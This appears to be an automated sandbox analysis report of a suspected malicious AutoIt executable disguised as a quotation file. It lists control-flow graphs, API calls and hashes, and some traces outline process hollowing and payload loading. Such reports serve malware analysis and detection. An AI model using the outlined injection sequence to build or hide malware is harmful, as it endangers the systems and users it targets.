                                                                                      control_flow_graph 499 e1a6d0-e1a77e call e180d0 502 e1a785-e1a7ab call e1b5e0 CreateFileW 499->502 505 e1a7b2-e1a7c2 502->505 506 e1a7ad 502->506 511 e1a7c4 505->511 512 e1a7c9-e1a7e3 VirtualAlloc 505->512 507 e1a8fd-e1a901 506->507 509 e1a943-e1a946 507->509 510 e1a903-e1a907 507->510 513 e1a949-e1a950 509->513 514 e1a913-e1a917 510->514 515 e1a909-e1a90c 510->515 511->507 518 e1a7e5 512->518 519 e1a7ea-e1a801 ReadFile 512->519 520 e1a952-e1a95d 513->520 521 e1a9a5-e1a9ba 513->521 516 e1a927-e1a92b 514->516 517 e1a919-e1a923 514->517 515->514 524 e1a93b 516->524 525 e1a92d-e1a937 516->525 517->516 518->507 526 e1a803 519->526 527 e1a808-e1a848 VirtualAlloc 519->527 528 e1a961-e1a96d 520->528 529 e1a95f 520->529 522 e1a9ca-e1a9d2 521->522 523 e1a9bc-e1a9c7 VirtualFree 521->523 523->522 524->509 525->524 526->507 530 e1a84a 527->530 531 e1a84f-e1a86a call e1b830 527->531 532 e1a981-e1a98d 528->532 533 e1a96f-e1a97f 528->533 529->521 530->507 539 e1a875-e1a87f 531->539 536 e1a99a-e1a9a0 532->536 537 e1a98f-e1a998 532->537 535 e1a9a3 533->535 535->513 536->535 537->535 540 e1a881-e1a8b0 call e1b830 539->540 541 e1a8b2-e1a8c6 call e1b640 539->541 540->539 547 e1a8c8 541->547 548 e1a8ca-e1a8ce 541->548 547->507 549 e1a8d0-e1a8d4 CloseHandle 548->549 550 e1a8da-e1a8de 548->550 549->550 551 e1a8e0-e1a8eb VirtualFree 550->551 552 e1a8ee-e1a8f7 550->552 551->552 552->502 552->507
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E1A7A1
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E1A9C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileFreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 204039940-0
                                                                                      • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                      • Instruction ID: a38f5dc1df5f9f0da717cc24a38efbd386e3d05d2ed9a4860813c432b8cff172
                                                                                      • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                      • Instruction Fuzzy Hash: EBA11770E01209EBDB14CFA4C998BFEB7B5FF48304F249169E215BB280D7759A81CB95
                                                                                      Function 000C2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 563 c2c63-c2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C2C91
                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C2CB2
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,000C1CAD,?), ref: 000C2CC6
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,000C1CAD,?), ref: 000C2CCF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShow
                                                                                      • String ID: AutoIt v3$edit
                                                                                      • API String ID: 1584632944-3779509399
                                                                                      • Opcode ID: c2a1766012652c63616c3f8a17f2384799addf727d85c704eb20f6d8e0103e20
                                                                                      • Instruction ID: 555858e77866bac33c99a308619502770e0a3a0de833dc73a82619dd23d1d54b
                                                                                      • Opcode Fuzzy Hash: c2a1766012652c63616c3f8a17f2384799addf727d85c704eb20f6d8e0103e20
                                                                                      • Instruction Fuzzy Hash: C7F0DA75540391BEEB311B27AC08E773EBDE7CAF61B00005AFD14A69A0C67119D4DAB1
                                                                                      Function 00E1A480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 678 e1a480-e1a5cd call e180d0 call e1a370 CreateFileW 685 e1a5d4-e1a5e4 678->685 686 e1a5cf 678->686 689 e1a5e6 685->689 690 e1a5eb-e1a605 VirtualAlloc 685->690 687 e1a684-e1a689 686->687 689->687 691 e1a607 690->691 692 e1a609-e1a620 ReadFile 690->692 691->687 693 e1a622 692->693 694 e1a624-e1a65e call e1a3b0 call e19370 692->694 693->687 699 e1a660-e1a675 call e1a400 694->699 700 e1a67a-e1a682 ExitProcess 694->700 699->700 700->687
                                                                                      APIs
                                                                                        • Part of subcall function 00E1A370: Sleep.KERNELBASE(000001F4), ref: 00E1A381
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E1A5C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileSleep
                                                                                      • String ID: ES9Y7H281CDYVVYDD7LC
                                                                                      • API String ID: 2694422964-148796157
                                                                                      • Opcode ID: e0a77e89d3fb833941fcf30cb5155f0ac36e0c1659617306f3dac9ed843b71fc
                                                                                      • Instruction ID: 7959db55b66186bfc572017e07c24468e364b82b3faf03ced0a7cc055b1e40c2
                                                                                      • Opcode Fuzzy Hash: e0a77e89d3fb833941fcf30cb5155f0ac36e0c1659617306f3dac9ed843b71fc
                                                                                      • Instruction Fuzzy Hash: 2E518630D05248DBEF11DBE4C814BEEBB79AF19304F144199E249BB2C1D6B91B85CB66
                                                                                      Function 000C3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 738 c3b1c-c3b27 739 c3b99-c3b9b 738->739 740 c3b29-c3b2e 738->740 741 c3b8c-c3b8f 739->741 740->739 742 c3b30-c3b48 RegOpenKeyExW 740->742 742->739 743 c3b4a-c3b69 RegQueryValueExW 742->743 744 c3b6b-c3b76 743->744 745 c3b80-c3b8b RegCloseKey 743->745 746 c3b78-c3b7a 744->746 747 c3b90-c3b97 744->747 745->741 748 c3b7e 746->748 747->748 748->745
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000C3B0F,SwapMouseButtons,00000004,?), ref: 000C3B40
                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000C3B0F,SwapMouseButtons,00000004,?), ref: 000C3B61
                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,000C3B0F,SwapMouseButtons,00000004,?), ref: 000C3B83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Control Panel\Mouse
                                                                                      • API String ID: 3677997916-824357125
                                                                                      • Opcode ID: 97fb02fb39f1050f6d84a9fb68eb34c8ed1313218f22f1c37adb634a02781225
                                                                                      • Instruction ID: f4b6254dbcab8f999431eebd78de3660539647761d391235f085f1c03dc3d8bd
                                                                                      • Opcode Fuzzy Hash: 97fb02fb39f1050f6d84a9fb68eb34c8ed1313218f22f1c37adb634a02781225
                                                                                      • Instruction Fuzzy Hash: 66112AB5520208FFDB608FA5DC44EEFB7BCEF44755B108459BA05D7150D3319E409BA0
                                                                                      Function 00E19370 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 749 e19370-e19410 call e1b810 * 3 756 e19412-e1941c 749->756 757 e19427 749->757 756->757 759 e1941e-e19425 756->759 758 e1942e-e19437 757->758 760 e1943e-e19af0 758->760 759->758 761 e19b03-e19b30 CreateProcessW 760->761 762 e19af2-e19af6 760->762 768 e19b32-e19b35 761->768 769 e19b3a 761->769 763 e19af8-e19afc 762->763 764 e19b3c-e19b69 762->764 765 e19b75-e19ba2 763->765 766 e19afe 763->766 784 e19b73 764->784 785 e19b6b-e19b6e 764->785 770 e19bac-e19bc6 Wow64GetThreadContext 765->770 791 e19ba4-e19ba7 765->791 766->770 772 e19f31-e19f33 768->772 769->770 773 e19bc8 770->773 774 e19bcd-e19be8 ReadProcessMemory 770->774 778 e19eda-e19ede 773->778 776 e19bea 774->776 777 e19bef-e19bf8 774->777 776->778 780 e19c21-e19c40 call e1ae90 777->780 781 e19bfa-e19c09 777->781 782 e19ee0-e19ee4 778->782 783 e19f2f 778->783 800 e19c42 780->800 801 e19c47-e19c6a call e1afd0 780->801 781->780 787 e19c0b-e19c1a call e1ade0 781->787 788 e19ee6-e19ef2 782->788 789 e19ef9-e19efd 782->789 783->772 784->770 785->772 787->780 804 e19c1c 787->804 788->789 794 e19f09-e19f0d 789->794 795 e19eff-e19f02 789->795 791->770 791->772 796 e19f19-e19f1d 794->796 797 e19f0f-e19f12 794->797 795->794 802 e19f2a-e19f2d 796->802 803 e19f1f-e19f25 call e1ade0 796->803 797->796 800->778 808 e19cb4-e19cd5 call e1afd0 801->808 809 e19c6c-e19c73 801->809 802->772 803->802 804->778 816 e19cd7 808->816 817 e19cdc-e19cfa call e1b830 808->817 810 e19c75-e19ca6 call e1afd0 809->810 811 e19caf 809->811 818 e19ca8 810->818 819 e19cad 810->819 811->778 816->778 822 e19d05-e19d0f 817->822 818->778 819->808 823 e19d11-e19d43 call e1b830 822->823 824 e19d45-e19d49 822->824 823->822 826 e19e34-e19e51 call e1a9e0 824->826 827 e19d4f-e19d5f 824->827 834 e19e53 826->834 835 e19e58-e19e77 Wow64SetThreadContext 826->835 827->826 829 e19d65-e19d75 827->829 829->826 833 e19d7b-e19d9f 829->833 836 e19da2-e19da6 833->836 834->778 837 e19e79 835->837 838 e19e7b-e19e86 call e1ad10 835->838 836->826 839 e19dac-e19dc1 836->839 837->778 845 e19e88 838->845 846 e19e8a-e19e8e 838->846 841 e19dd5-e19dd9 839->841 843 e19e17-e19e2f 841->843 844 e19ddb-e19de7 841->844 843->836 847 e19e15 844->847 848 e19de9-e19e13 844->848 845->778 849 e19e90-e19e93 846->849 850 e19e9a-e19e9e 846->850 847->841 848->847 849->850 852 e19ea0-e19ea3 850->852 853 e19eaa-e19eae 850->853 852->853 854 e19eb0-e19eb3 853->854 855 e19eba-e19ebe 853->855 854->855 856 e19ec0-e19ec6 call e1ade0 855->856 857 e19ecb-e19ed4 855->857 856->857 857->760 857->778
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00E19B2B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E19BC1
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E19BE3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                      • Instruction ID: 696d4d26075001d66caf411f833c3b392e5ec8451c56ff36e034cdffa84d891b
                                                                                      • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                      • Instruction Fuzzy Hash: A162FB30A14258DBEB24CFA4C850BDEB376EF58304F1091A9D10DFB295E7769E81CB59
                                                                                      Function 000C3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 859 c3923-c3939 860 c393f-c3954 call c6270 859->860 861 c3a13-c3a17 859->861 864 103393-1033a2 LoadStringW 860->864 865 c395a-c3976 call c6b57 860->865 867 1033ad-1033b6 864->867 871 c397c-c3980 865->871 872 1033c9-1033e5 call c6350 call c3fcf 865->872 869 c3994-c3a0e call e2340 call c3a18 call e4983 Shell_NotifyIconW call c988f 867->869 870 1033bc-1033c4 call ca8c7 867->870 869->861 870->869 871->867 874 c3986-c398f call c6350 871->874 872->869 885 1033eb-103409 call c33c6 call c3fcf call c33c6 872->885 874->869 885->869
                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C3A04
                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001033A2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoadNotifyShell_String
                                                                                      • String ID: Line:
                                                                                      • API String ID: 3363329723-1585850449
                                                                                      • Opcode ID: e7d8b548b30345f4e0380540edacc8e41d6d59a828fb015fa24c818bf326f6d3
                                                                                      • Instruction ID: d24c7d4d8b9e56d99962dacae7caeb79f1e62206e2ea377e4b29f5604a9d7308
                                                                                      • Opcode Fuzzy Hash: e7d8b548b30345f4e0380540edacc8e41d6d59a828fb015fa24c818bf326f6d3
                                                                                      • Instruction Fuzzy Hash: 8431C171518305AED725EB20DC46FEFB7E8AB40720F00892EF59993592DB709B89C7C2
                                                                                      Function 00147F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001482F5
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 001482FC
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 001484DD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 146820519-0
                                                                                      • Opcode ID: 1a7c0a7ec64d5e4f5679bc825b952fe12f3c4cb305adc6d4879db4f4fadaa483
                                                                                      • Instruction ID: ebc0b70f34ef5e7419b53a67b2c22787e29e8895df67acefb2fdac245e244274
                                                                                      • Opcode Fuzzy Hash: 1a7c0a7ec64d5e4f5679bc825b952fe12f3c4cb305adc6d4879db4f4fadaa483
                                                                                      • Instruction Fuzzy Hash: D6126B71A083019FC714DF28C484B6EBBE5BF85314F04895DE8998B2A2DB71E946CF92
                                                                                      Function 000C10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000C1BF4
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 000C1BFC
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000C1C07
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000C1C12
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 000C1C1A
                                                                                        • Part of subcall function 000C1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 000C1C22
                                                                                        • Part of subcall function 000C1B4A: RegisterWindowMessageW.USER32(00000004,?,000C12C4), ref: 000C1BA2
                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000C136A
                                                                                      • OleInitialize.OLE32 ref: 000C1388
                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 001024AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1986988660-0
                                                                                      • Opcode ID: 4497153e40484b13a5ca7a6bd70ea5b9a4cb44e12925bf930734bcf3add4849a
                                                                                      • Instruction ID: 51b19cdaaf0505a943bdb5370a3129b00d8625052b37545a85874a1a374d7769
                                                                                      • Opcode Fuzzy Hash: 4497153e40484b13a5ca7a6bd70ea5b9a4cb44e12925bf930734bcf3add4849a
                                                                                      • Instruction Fuzzy Hash: B271CFB4901303AFE785DF79AA45A993AE1FB8A344357822FD41AD7B62EB3044C5CF41
                                                                                      Function 000C2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00102C8C
                                                                                        • Part of subcall function 000C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C3A97,?,?,000C2E7F,?,?,?,00000000), ref: 000C3AC2
                                                                                        • Part of subcall function 000C2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000C2DC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                      • String ID: X
                                                                                      • API String ID: 779396738-3081909835
                                                                                      • Opcode ID: 8949581d72b05628e57ca6a6395ab7691f592e379477b4a7e28ea09b654f0b43
                                                                                      • Instruction ID: 3f137b3d2f21d416521dda66e55c7defd06fe712f4accad0d8fffebac898d2bd
                                                                                      • Opcode Fuzzy Hash: 8949581d72b05628e57ca6a6395ab7691f592e379477b4a7e28ea09b654f0b43
                                                                                      • Instruction Fuzzy Hash: C2217571A102589FDB11EF94C849BEE7BFCAF49314F00805DE545BB281DBF45A898FA1
                                                                                      Function 000C3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C3908
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_
                                                                                      • String ID:
                                                                                      • API String ID: 1144537725-0
                                                                                      • Opcode ID: e9518a028b3783e991c15940804d047f04c89f54857e8176bc306f8daf2380ac
                                                                                      • Instruction ID: e996329e0dbd43ae21edc3b36fa6cb3e57f568df8d932491f2e056a3fa39fd41
                                                                                      • Opcode Fuzzy Hash: e9518a028b3783e991c15940804d047f04c89f54857e8176bc306f8daf2380ac
                                                                                      • Instruction Fuzzy Hash: 8A319170504301DFD760DF24D885B9BBBF8FB49718F00092EF59987680E7B1AA88CB92
                                                                                      Function 000C5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000C949C,?,00008000), ref: 000C5773
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,000C949C,?,00008000), ref: 00104052
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 7007c6425eb0904fb2bb2f65f7db4c74ff81cdee74e97a7416ba02a012b3b321
                                                                                      • Instruction ID: 7904c858cccaff5434ca6689a33ce673a1e7c945c6d0f8f01b16b765cc0203d5
                                                                                      • Opcode Fuzzy Hash: 7007c6425eb0904fb2bb2f65f7db4c74ff81cdee74e97a7416ba02a012b3b321
                                                                                      • Instruction Fuzzy Hash: 35016130145725F6E3315A259C4EF9B7E98EF067B1F108304BA986E1E087B45494CB90
                                                                                      Function 000F29C8 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,000FD7D1,00000000,00000000,00000000,00000000,?,000FD7F8,00000000,00000007,00000000,?,000FDBF5,00000000), ref: 000F29DE
                                                                                      • GetLastError.KERNEL32(00000000,?,000FD7D1,00000000,00000000,00000000,00000000,?,000FD7F8,00000000,00000007,00000000,?,000FDBF5,00000000,00000000), ref: 000F29F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: e2cf8bf80774f51aad8ee6141bf2fcbb647dda0c4acc037138438f2900a9a0c2
                                                                                      • Instruction ID: 9948356861fa56a8263ed10ff79c15cf199249594b1a37f39a6a0a66d0d1d4f3
                                                                                      • Opcode Fuzzy Hash: e2cf8bf80774f51aad8ee6141bf2fcbb647dda0c4acc037138438f2900a9a0c2
                                                                                      • Instruction Fuzzy Hash: 1EE08631100349EFDB206FB1EC08BA93BD8AB40751F140029F60999861DB3094D0D784
                                                                                      Function 000F86AE Relevance: 2.6, APIs: 2, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,000F85CC,?,00188CC8,0000000C), ref: 000F8704
                                                                                      • GetLastError.KERNEL32(?,000F85CC,?,00188CC8,0000000C), ref: 000F870E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
